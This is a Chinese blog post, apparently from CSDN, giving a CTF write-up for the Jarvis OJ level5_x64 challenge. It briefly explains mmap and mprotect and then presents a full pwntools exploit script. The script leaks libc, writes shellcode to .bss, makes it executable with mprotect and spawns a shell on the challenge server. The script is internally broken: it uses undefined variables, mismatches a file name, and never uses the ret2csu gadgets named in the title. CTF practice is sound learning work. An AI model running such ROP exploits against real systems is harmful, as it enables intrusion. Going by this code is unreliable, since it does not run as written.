Ret2csu Jarvisoj level5_x64

最新推荐文章于 2022-11-07 23:37:41 发布
最新推荐文章于 2022-11-07 23:37:41 发布
阅读量255 收藏 1
点赞数 1
分类专栏: JARVISOJ 文章标签: 安全 pwn linux python c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arraylocalhost/article/details/124207076
版权

本题有hint:system和execve函数被禁用,使用mmap和mprotect完成本题

浅谈mmap与mprotect

mmap

将文件映射到一段内存并且可以修改那段内存的权限

头文件 <sys/mman.h>
函数原型
void* mmap(void* start,size_t length,int prot,int flags,int fd,off_t offset);
int munmap(void* start,size_t length);

mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。

函数原型

#include <unistd.h>   
#include <sys/mmap.h>   
int mprotect(const void *start, size_t len, int prot);

prot 

映射区域的权限
PROT_EXEC 可执行
PROT_READ 可读取
PROT_WRITE 可写入
PROT_NONE 不能存取

x64下 _libc_csu_init函数,对libc进行初始化

用gadget控制任意函数调用

_libc_csu_init函数的通用gadgets

64位会首先将参数传到6个寄存器中

要对寄存器操作可以在栈中部署shellcode控制寄存器,但是NX保护开启,堆栈不可执行,不能直接写入shellcode,就需要利用gadget

gadget本质是一个程序或者libc中的汇编指令

大致攻击思路:利用mprotect()函数修改.bss段为可写入可执行,写入shellcode,get shell

1.checksec+运行

64位+NX保护

2.强大IDA进行中

1.main函数

2._vulnerable_function 

 buf  offset =0x80

具体步骤:

  1. 泄露libc基地址
  2. 将shellcode写入.bss段
  3. 调用read函数,将.bss段地址与mprotect函数写入got表
  4. 调用mprotect函数,修改.bss段权限
  5. 执行shellcode

 

直接上脚本 

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote('pwn2.jarvisoj.com',9884)
#p = process('./level3_x64')
level5 = ELF('level3x64')
libc = ELF('libc-2.19.so')

vulfun_addr = 0x4005E6
plt_write = level5.plt['write']
plt_read = level5.plt['read']
got_write = level5.got['write']
rdi_addr = 0x4006b3
rsi_addr = 0x4006b1

payload1 = 'a'*0x88 + p64(pdr_addr) + p64(1) + p64(psr_addr) + p64(got_write) + p64(0) + p64(plt_write) + p64(vulfun_addr)
p.recvuntil("Input:\n")
p.send(payload1)

pause()
write_addr = u64(p.recv(8))
libc_mprotect = libc.symbols['mprotect']
libc_write = libc.symbols['write']
mprotect_addr = write_addr - libc_write + libc_mprotect
pxr_addr = write_addr -libc_write + 0x1b8e
bss_addr = level5.bss()
payload2 = 'a'*0x88 + p64(pdr_addr) + p64(0) + p64(psr_addr) +p64(bss_addr) + p64(0) + p64(plt_read) + p64(vulfun_addr)
p.recvuntil("Input:\n")
p.send(payload2)
shellcode = asm(shellcraft.sh())
p.send(shellcode)

pause()
payload3 = 'a'*0x88 + p64(pdr_addr) + p64(0x600000) + p64(psr_addr) + p64(0x1000) + p64(0) + p64(pxr_addr) + p64(7) + p64(mprotect_addr) + p64(bss_addr)
p.recvuntil("Input:\n")
p.send(payload3)
p.interactive()

rwx的十进制表示为7,7作为第3个参数放在rdx,一般不存在有关rdx的gadget,借用_libc_csu_init函数的通用gadgets

更具体的内容参考以下博客

好好说话之ret2csu_hollk的博客-CSDN博客

Rt1Text
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(Jarvis Oj)(Pwn) level5
Nothing
05-03 2029
(Jarvis Oj)(Pwn) level5 题目描述:mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。附件和level3_x64的附件一样。 首先去看看这个mmap函数和mprotect函数是干啥的。 void* mmap(void* addr, size_t len, int port, int flag, int...
ROP之ret2csu 【[HNCTF 2022 WEEK2] ret2csu
最新发布
Chuang__的博客
03-11 858
中级ROP之ret2csu,介绍了ret2csu的一般用法,以及个人小技巧
JarvisOJ level5
PLpa的博客
07-11 398
题目要求不用system和execve函数,练习使用mmap和mprotect函数。 首先看一下mmap函数和mprotect函数有什么用。 mmap()函数 mmap将一个文件或者其它对象映射进内存。文件被映射到多个页上,如果文件的大小不是所有页的大小之和,最后一个页不被使用的空间将会清零。mmap在用户空间映射调用系统中作用很大。 头文件 <sys/mman.h> 函数原型 voi...
jarvisoj_level5
z1r0的博客
12-29 338
jarvisoj_level5 buu上的这个题目对应的是level3 x64jarvisoj_level3 x64
jarvis oj level5
发蝴蝶和大脑斧的博客
12-11 928
level5要求不用system和execve,而是用mprotect和mmap,查了一下,mmap主要是将哪个文件映射到一段内存去同时设置那段内存的属性 可读可写或者是可执行,mprotect函数是将从addr开始的地址 ,长度位len的内存的访问权限。毫无头绪。查了网上大神的wp,才知道思路。 首先leak地址,shellcode写入bss没什么好说的。 要说下为什么要把bss和mprotec...
[BUUCTF]PWN——jarvisoj_level5
mcmuyanga的博客
01-19 600
jarvisoj_level5 附件 步骤: 例行检查,64位程序,只开启了nx保护 本地运行一下,看看大概的情况 64位ida载入,找到关键函数 buf是0x80,read了0x200,明显的溢出漏洞。采用常规的ret2libc方法 程序里用过了write函数,所以利用write函数来泄露libc 先看一下write函数的原型 ssize_t write( int fd, const void * buf,size_t nbytes) write函数将buf中的nbytes字节内容写
[XMAN]level5 Jarvis OJ
九层台
07-10 1091
思路:bss段刚开始是不可执行的,从通用的想要执行bss必须执行mprotect函数来更改bss段的权限(改为7即可读可写可执行)。但是想要获取到mprotect函数必须获取到libc版本。还是少不了上次的泄露libc函数,这里泄露的时候也直接用通用gedit减少不必要的操作,减少错误。 泄露获取libc–&amp;gt;获取到mprotect函数来改写bss段的权限–&amp;gt;把shellcode写入到...
CTF-PWN level5(Jarvis Oj)
SuperGate的博客
05-16 813
level3_x64一样的文件,但是限制不能使用system和execv函数拿shell,但是可以用mmap和mprotect完成本题。 我尝试用mprotect来解决,首先mprotect的结构如下: int mprotect(const void *start, size_t len, int prot); 参数的含义是:把从start开始长度为len的内存区的保护属性修改为prot...
Ret2csu level5 & ciscn_2019_s_3
红叶的博客
11-06 421
本题难点:对栈的理解需要稍微更深入一点。
18.9.25 Jarvis OJ PWN----[XMAN]level5
qq_42192672的博客
09-25 534
题目提示: 参考链接:https://veritas501.space/2017/03/10/JarvisOJ_WP/                   https://blog.csdn.net/github_36788573/article/details/80178146 mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完...
wikiCTF-pwn-ret2csu
Oops-re的博客
10-20 398
在 64 位程序中,函数的前 6 个参数是通过寄存器传递的,但是大多数时候,我们很难找到每一个寄存器对应的 gadgets。这时候,我们可以利用 x64 下的 __libc_csu_init 中的 gadgets。
栈溢出漏洞学习与剖析
njh18790816639的博客
03-13 296
0x00 刚开始接触pwn,但是pwn呢!不应该只会做题,应该理解里面的原理,所以我们来看看程序里面究竟蕴含着什么神秘! 0x01 程序的执行就是一种线性的"纸",上面有许多内容。 就是一张"纸",在上面写了很多内容,Stack是栈,Heap是堆,这两个是最为关键的,因为接下来我们利用的就是有关这两个的漏洞。 程序在上面执行,code代码段(其实就是汇编指令)利用这里面的指令一步一步的运行。你可能有疑问?while和if和for等其实就是jmp等跳转指令,从一张"纸"的第一行开始"写",到了第三行(假设)有
中级ROP之ret2csu
至臻求学,胸怀云月
02-22 7294
ret2csu 原理 在64位程序中,函数的前6个参数是通过寄存器传递的,但是大多数时候,我们很难找到每一个寄存器对应的gadgets。这时候,我们可以利用x64下的__libc_csu_init中的gadgets,如例二情况。 这个函数是用来对libc进行初始化操作的,而一般的程序都会调用libc函数,所以这个函数一定会存在。 下面是我在IDA摘出来的__libc_csu_init函数的汇编...
从o开始的pwn学习之ret2csu
jzc020121的博客
04-09 2879
ret2csu 前置知识 X64寄存器 我们知道,64位寄存器有RAX,RBX,RCX,RDX,RDI,RSI,RBP,RSP,R8,R9,R10,R11,R12,R13,R14,R15,而rdi,rsi,rdx,rcx,r8,r9便用来传递函数的前六个参数,如多于六个,便在放到栈里。 __libc_csu_init 一般的程序都会调用libc中的函数,而此函数便是来将libc初始化的,故此函数几乎是每一个程序所必备的。 gadget 我们在构造ROP链的时候,往往会用到能够给寄存器赋值的gadget,形如
好好说话之ret2csu
hollk’s blog
06-22 5743
一、x64寄存器 在64位程序中,函数的前6各参数是通过寄存器传递的,可以看到rdi作为第一个参数,rsi作为第二个参数,rdx作为第三个参数,rcx作为第四个参数,r8作为第五个参数,r9作为第六个参数。也就是说在函数调用参数的时候会依次在六个寄存器中寻找,如果参数多余6个,那么就需要在栈中寻找。 63 31 ...
初探ROP
KKABqN
03-16 2851
文章目录0x01 前言0x02 什么是ROP0x03 为什么要ROP0x04 基本ROPret2shellcode含义从原理中解析ret2shellcode从例子中解析ret2shellcode发现利用点确定利用前提调试扩展点ret2text含义从例子中解析ret2text发现利用点确定利用前提调试ret2syscall含义从例子中解析ret2syscall的方法细说系统调用在ret2syscal......
ISCTF PWN WP 2022
GeekCmore的博客
11-07 1441
ISCTF PWN 部分题解 WP
从BUUCTF之“jarvisoj_level5”中看如何暗度陈仓实现“mprotect”修改.bss段为可执行
Probeginner的博客
12-10 656
mprotect修改权限实践
多线程内存问题分析之mprotect方法
11-19 2147
http://www.yebangyu.org/blog/2016/02/01/detectmemoryghostinmultithread/ 多线程中的内存问题,一直被认为是噩梦般的存在,几乎只有高手、大仙才能解决。除了大量的打log、gdb调试、code review以及依靠多年的经验和直觉之外,有没有一些分析的手段和工具呢?答案是肯定的。本文首先介绍其中的一种:mprote

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值